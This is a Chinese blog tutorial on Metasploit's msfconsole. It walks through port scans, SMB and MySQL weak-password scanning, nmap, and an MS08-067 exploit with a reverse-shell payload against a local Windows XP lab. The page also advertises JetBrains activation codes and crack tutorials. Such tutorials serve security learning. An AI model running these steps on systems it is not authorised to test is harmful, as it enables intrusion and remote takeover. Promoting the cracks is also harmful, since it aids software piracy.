1. 全栈程序员必看首页

msfconsole攻击工具_服务器console接口是干嘛的

全栈程序员-用户IM 未分类

msfconsole攻击工具_服务器console接口是干嘛的?Msfconsole工具概括:???Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.(1)进行端口扫描.(2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用WinXP,然后对服务器进行渗透测试.

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

?生活总会难过?,?但好运也会如期而至?

????????????????????????

       

?目录

                  ?Msfconsole工具 概括:

         ?免责声明:

         ?测试机:

         ?靶场:    

                  ?Msfconsole的使用:

        ?打开Msfconsole工具:

        ?第一步:进行端口扫描.

        ?第二步:进行服务的扫描.

        ?第三步:扫描3306(Mysql)端口的弱口令

        ?第四步:在msf模块里也可以使用nmap进行扫描.

        ?第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

         ?渗透测试失败的原因:

?Msfconsole工具 概括:

???Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.

      

?免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

     

?测试机:

kali2021    链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg 
                  提取码:tian

    

?靶场:    

本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win XP(IP地址:192.168.1.103)

Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客

    

?Msfconsole的使用:

?打开Msfconsole工具:

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

     

?第一步:进行端口扫描.

?(1)查看端口扫描的模块:

search portscan

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用端口扫描模块:

use auxiliary/scanner/portscan/tcp

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为100:

set threads 100

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run 或者 exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

       

?第二步:进行服务的扫描.

?(1)查看smb_version服务模块:

search smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用服务模块:

use auxiliary/scanner/smb/smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为10:

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

        

?第三步:扫描3306(Mysql)端口的弱口令

?(1)查看扫描3306(Mysql)端口的弱口令模板信息:

search mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用扫描3306(Mysql)端口的弱口令模块:

use auxiliary/scanner/mysql/mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为10:

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

          

?第四步:在msf模块里也可以使用nmap进行扫描.

?(1)主机发现:

nmap -sn 地址/24

msfconsole攻击工具_服务器console接口是干嘛的

?(2)端口扫描:

nmap -sS 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(3)系统扫描:

nmap -O 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(4)版本扫描:

nmap -sV 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(5)综合扫描:

nmap -A 地址

msfconsole攻击工具_服务器console接口是干嘛的

     

?第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

?(1)启动 postgresql 数据库:

systemctl start postgresql.service

msfconsole攻击工具_服务器console接口是干嘛的

     

?(2)设置为开机自启:

systemctl enable postgresql

msfconsole攻击工具_服务器console接口是干嘛的

     

?(3)启动 Metasploit

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

    

?(4)搜索Win XP漏洞对应的模块.

search ms08_067

msfconsole攻击工具_服务器console接口是干嘛的

     

?(5)使用Win XP漏洞扫描模块.

use exploit/windows/smb/ms08_067_netapi

msfconsole攻击工具_服务器console接口是干嘛的

     

?(6)设置攻击载荷

set payload generic/shell_reverse_tcp

msfconsole攻击工具_服务器console接口是干嘛的

     

?(7)查看模块信息(模块里的yes都要填).

show options

msfconsole攻击工具_服务器console接口是干嘛的

     

?(8)查看渗透攻击模块的攻击平台,找到操作系统平台版本

show targets

msfconsole攻击工具_服务器console接口是干嘛的

     

?(9)设置操作系统(target).

set target 34

msfconsole攻击工具_服务器console接口是干嘛的

      

?(10)设置目标IP.

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

    

?(11)设置本地IP

set LHOST 本地IP

msfconsole攻击工具_服务器console接口是干嘛的

     

?(12)设置端口:

set LPORT 4444

msfconsole攻击工具_服务器console接口是干嘛的

     

?(13)使用(执行):run或者exploit

msfconsole攻击工具_服务器console接口是干嘛的

     

?(14)渗透测试成功. 

   

    

?渗透测试失败的原因:

?(1)靶机开启了防火墙.

?(2)两台主机不能互联.(用 ping IP地址)

     

   

   

参考链接:使用MSF 利用 ms08_067 对 XP 进行渗透_丰梓林的博客-CSDN博客

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/196341.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
全栈程序员-用户IM全栈程序员-用户IM
0 0


相关推荐

  • 如何免费的、完整的把 PDF 转换为 Word?

    如何免费的、完整的把 PDF 转换为 Word?

    如何免费的、完整的把 PDF 转换为 Word?先给大家打个预防针:由于PDF文件本身的特性,想要百分百完美地将它转回Word格式基本上是不可能的!我们都知道PDF是一种不能编辑的文件,如果要将pdf文件转换成word文件又该怎样转换呢?其实我们可以借助工具实现pdf转换成word的操作哦。你有没有遇到过要将PDF转换为Word需求的时候,找了一大堆工具,进行转换发现有一些转换不了,有一些转换限制,需要付费才能全部转换完成。我最近也是遇到有一个需求需要将PDF转换为Wold,找了好几个工具都是收费的(因为只是转换一两次,没必要充个会员,不.

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年6月12日
  • 安卓内核编程_内核编程用什么语言

    安卓内核编程_内核编程用什么语言

    安卓内核编程_内核编程用什么语言http://blog.csdn.net/Luoshengyang/article/details/6568411Android4.04源码编译(ubuntu12.04)http://www.adaiw.com/?p=167如何下载并编译Android4.0内核源码goldfish(图文)http://blog.csdn.net/flydream

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年10月8日
  • GoLand 2021.7.20 激活码【永久激活】 idea

    GoLand 2021.7.20 激活码【永久激活】

    (GoLand 2021.7.20 激活码)2021最新分享一个能用的的激活码出来,希望能帮到需要激活的朋友。目前这个是能用的,但是用的人多了之后也会失效,会不定时更新的,大家持续关注此网站~IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.cn/100143.html…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年3月20日
  • MYSQL EXPLAIN结果详解

    MYSQL EXPLAIN结果详解

    MYSQL EXPLAIN结果详解EXPLAIN不会告诉你关于触发器、存储过程的信息或用户自定义函数对查询的影响情况。EXPLAIN不考虑各种Cache(缓存)。EXPLAIN不能显示MySQL在执行查询时所作的优化工作。部分统计信息是估算的,并非精确值。 EXPALIN只能解释SELECT操作,其他操作要重写为SELECT后查看执行计划。1idselect的识别符,这是select的查询序列号。如果有两列数据id相同,则为同一组查询,由上到下执行。如果id值不同,id值越大,优先级越高。2select_type

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年8月31日
  • 软件测试面试题及答案2020_软件测试面试题目100及最佳答案

    软件测试面试题及答案2020_软件测试面试题目100及最佳答案

    软件测试面试题及答案2020_软件测试面试题目100及最佳答案1.性能测试关注的指标是什么?从外部看,性能测试主要关注如下三个指标:吞吐量:每秒钟系统能够处理的请求数、任务数响应时间:服务员处理一个请求或一个任务的耗时错误率:一次请求中结果出错的请求所占比例从服务器的角度看,性能测试主要关注CPU、内存、服务器负载、网络、磁盘IO等。2.性能测试是怎么做的?/如果你要进行性能测试,你是如何展开操作的?1.确定关键业务,关键路径;2.确定测试的关键数据。比如并发量,响应时间,循环次数等;3.准备测试环境,完成脚本录制或脚本开发;4.执行测试,观察或监控输出参数,比如吞

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年9月1日
  • traceroute和tracert用法详解「建议收藏」

    traceroute和tracert用法详解「建议收藏」

    traceroute和tracert用法详解「建议收藏」一、什么是Traceroute?            Internet,即国际互联网,是目前世界上最大的计算机网络,更确切地说是网络的网络。它由遍布全球的几万局域网和数百万台计算机组成,并通过用于异构网络的TCP/IP协议进行网间通信。互联网中,信息的传送是通过网中许多段的传输介质和设备(路由器,交换机,服务器,网关等等)从一端到达另一端。每一个连接在Internet上的设备,如主…

    全栈程序员-用户IM 全栈程序员-用户IM
    2022年11月2日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号